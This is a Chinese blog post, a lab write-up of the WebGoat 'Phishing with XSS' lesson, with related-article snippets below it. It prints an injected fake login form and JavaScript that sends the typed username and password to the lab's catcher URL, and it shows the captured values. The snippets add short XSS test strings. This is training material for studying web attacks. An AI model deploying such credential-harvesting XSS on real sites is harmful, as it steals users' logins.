webgoat Phishing with XSS测试

最新推荐文章于 2022-03-04 17:16:57 发布
最新推荐文章于 2022-03-04 17:16:57 发布
阅读量539 收藏
点赞数
文章标签: java
原文链接:https://my.oschina.net/kongjunli/blog/749896
版权

“钓鱼测试”

目的就是创建一个表单,让受害者填写用户名和密码信息,然后会截取用户信息提交到webgoat上去。主要测试代码分为一下两部分:

<form>
<br>This feature requires account login:</br>
EnterName:<br><input type="text" id="user" name="user"><br>
EnterPassWord:<br><input type="password" password="pass"><br>
<br><input type="submit" name="login" value="login" onclick="hack()"><br>//onclick 当点击时被触发
</form>

这部分代码很简单 ,html语言创建一个表单,具体语法看菜鸟教程文档。 网上有一个教程说了测试代码的错误,其中一处是“submit” 应该改为“button”,不明白为什么这么做,看了文档,button就是创建一个可以点击的按钮,个人感觉还是submit,并且改为button后,就完全没反应了。。

下部分代码是将信息提交给webgoat了

<script>
//接收登陆信息
function hack(){
	alert("登陆信息将被窃取" "Username="+document.forms[1].user.value+"Password="+document.forms[1].pass.value);//弹出警告框 document.forms[1].property
	XSSimage=new Image();//创建一个图像对象
	XSSimage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+document.forms[1].user.value+"&password="+document.forms[1].pass.value+"";
}

但是,当我把全部的代码进行测试后,虽然显示“ * Congratulations. You have successfully completed this lesson. ”但是我并没有找到这个信息提交到哪里了,最后按照创建的url在“E:\WebGoat-5.4-OWASP_Standard_Win32\WebGoat-5.4\tomcat\webapps\WebGoat\users”中找到了,如下:

#guest
#Wed Sep 21 20:35:07 CST 2016
Phishing\ with\ XSS.viewedLessonPlan=false
Phishing\ with\ XSS.completed=true
Phishing\ with\ XSS.maxHintLevel=0
Phishing\ with\ XSS.numVisits=38
user=oo
Phishing\ with\ XSS.viewedParameters=false
Phishing\ with\ XSS.viewedSource=false
Phishing\ with\ XSS.viewedHtml=false
password=oooo
Phishing\ with\ XSS.viewedCookies=false
PROPERTY=yes

可以把这个文件夹删掉,再重新输入测试,就发现这个文件又被创建了,但有个问题就是:每次我换了其他的用户名和密码,提交到这个文件里的依然是oooo,不知道为什么,我猜想的一个原因是因为当时输入oooo时浏览器提示了“保存账户信息和密码”,可能是这个原因。

我们之所以可以截获是因为表单(登陆界面)是自己写的,可以随意添加,但实际其他的登陆我们只可以查看源代码却无法修改源代码,也就不那么容易截获啦

转载于:https://my.oschina.net/kongjunli/blog/749896

chengxi6966
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WebGoat实验之Cross-Site Scripting(XSS,跨站脚本攻击)- 2016.01.09
baishileily的博客
01-09 4829
XSS(Cross-Site Scripting)跨站脚本攻击,由于 html 和 js 都是解释执行的,那么如果对用户的输入过滤不够严格或者说不严格处理,那么当用户也输入一些 html 或者 js 的并被浏览器再次加载的时候也是可以被浏览器解释执行的。那么对于一些博客、贴吧等存在用户输入、又存在游客查看评论的地方,做好用户输入的过滤就很有必要。那么 XSS 能干什么呢?不仅可以用来进行钓鱼攻击,
WebGoat学习笔记(四)——Phishing with XSS
走走停停
11-12 1717
<br />最后能够成功的搜索代码为:<br /> <br /><form><br/><br/><HR><H3>This feature requires account login:</H3><br/><br/>Enter Username:<br/><input type="text" id="user" name="user"><br/>Enter Password:<br/><input type="password" name = "pass" id="pass"><br/><input type
Xss&Phishing
weixin_33875839的博客
07-21 73
Xss&Phishing 转载于:https://blog.51cto.com/wangwx/181205
XSS Phishing - 新式跨站脚本攻击方式
08-28 874
 信息来源:http://safe.it168.com/ss/2007-07-21/200707210129484.shtml 最近跨站脚本漏洞好像比较火,国内的一些比较出名的WEB程序都陆续暴出了跨站脚本漏洞,但是一提到跨站脚本漏洞的攻击方式大家都哑火了,因为在常规的概念中这种漏洞最多是挂网页木马,获取COOKIE之类,属于典型的鸡肋漏洞,甚至有些牛人也开始不看好这类漏洞!跨站脚本攻击最
WebGoat系列实验Cross-Site Scripting (XSS)
weixin_30578677的博客
09-18 485
WebGoat系列实验Cross-Site Scripting (XSS) PhishingTitle 本次实验是在一个已知存在XSS漏洞的页面进行钓鱼攻击。通过使用XSS与HTML注入,在页面中注入身份认证html代码,添加javascript脚本收集身份认证信息,并发送到http://localhost:8080/WebGoat/catcher?PROPERTY=yes... 输入以下jav...
WebGoat漏洞测试平台分析.zip
03-12
WebGoat漏洞测试平台分析
WebGoat漏洞测试平台分析.pdf
06-19
WebGoat漏洞测试平台分析。phpStudy+Mysql。
webgoat测试
03-29
WebGoat测试是一种基于OWASP(开放网络应用安全项目)的在线学习平台,专门用于教育和训练网络安全专业人员如何进行渗透测试WebGoat是一个故意设计有漏洞的Web应用程序,目的是让学习者通过实践来发现并利用这些...
webgoat-server程序包
最新发布
09-01
用于构建靶机环境 进行渗透测试练习
webgoat渗透测试攻略
08-30
webgoat相信大家都知道是一个非常好的渗透测试教学平台,这个文档为本人原创,总结了一些过关过程中的思路以及心得
Webgoat学习笔记.zip
03-12
Webgoat学习笔记
WebGoat5.4 Cross-Site Scripting (XSS) 开发版本关卡 通关攻略
weixin_46356548的博客
12-27 3487
本人在学习WebGoat5.4时,发现有些题目需要在开发版本上完成,网上能找到的所谓的通关教程,都说这些题目做不了,经过尝试发现,其实是可以完成的,本篇将对这部分进行重点说明。
XSS初探
weixin_30735745的博客
11-18 223
1 什么是XSS跨站脚本 跨站脚本是一种经常出现在Web应用程序中的计算机安全漏洞,是由于Web应用程序对用户输入过滤不足而产生的。攻击者利用网站漏洞把恶意的脚本代码注入到网页之中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害者可能采取Cookie资料盗取、会话劫持、钓鱼欺骗等各种攻击。 XSS跨站脚本本身对WEB服务器没有直接危害,它借助网站进行传播,使网站的大量用户...
2018-2019-2 网络对抗技术 20165324 Exp9: Web安全基础
weixin_34392906的博客
05-26 204
2018-2019-2 网络对抗技术 20165324 Exp9: Web安全基础 课下实验 实验内容概述 Webgoat准备 SQL注入攻击 命令注入(Command Injection) 数字型注入(Numeric SQL Injection) 日志欺骗(Log Spoofing SQL 注入(LAB: SQL Injection) 字符串注入(String SQL Injection...
WebGoat题目解答(General~XSS
weixin_33991727的博客
03-30 847
***General*************************************************************1、Http Spliting step1 cn%0aContent-length:%200%0a%0aHTTP/1.1%20200%20OK%0aContent-Type:%20text/html%0aConte...
WebGoat 网安攻击模拟操训
CLG2001的博客
03-04 4437
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分
OWASP Cross-Site Scripting (XSS) 思路笔记
isinstance的博客
02-17 1984
本此实践的WebGoat版本如下所示Phishing with XSSLesson Plan Title: Phishing with XSS(网络钓鱼与 XSS)这个看题目就知道要我们做什么了,主要就算通过XSS来让受害者输入自己的邮箱和密码来达到钓鱼的结果It is always a good practice to validate all input on the server side.
合天网安实验【XSS进阶一、二、三】
taozijun的博客
07-29 2724
直接get,neme=&lt;script&gt;alert(1)&lt;/script&gt; 用正则过滤了&lt;script&gt;和&lt;/script&gt;,我们name=&lt;Script&gt;alert(1)&lt;/Script&gt; 用正则过滤了&lt;script&gt;和&lt;/script&gt;(/i表示无视大小写),但只过滤一
WebGoat漏洞测试平台详解:PHPStudy+MySQL环境下的实战与防御策略
WebGoat漏洞测试平台分析是一份详细的教程,主要针对Web安全领域的学习者和专业人员。作者吴科在2019年3月9日撰写了这份文档,旨在帮助读者理解并掌握WebGoat这一流行的漏洞测试工具的使用。 该文档分为几个部分,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值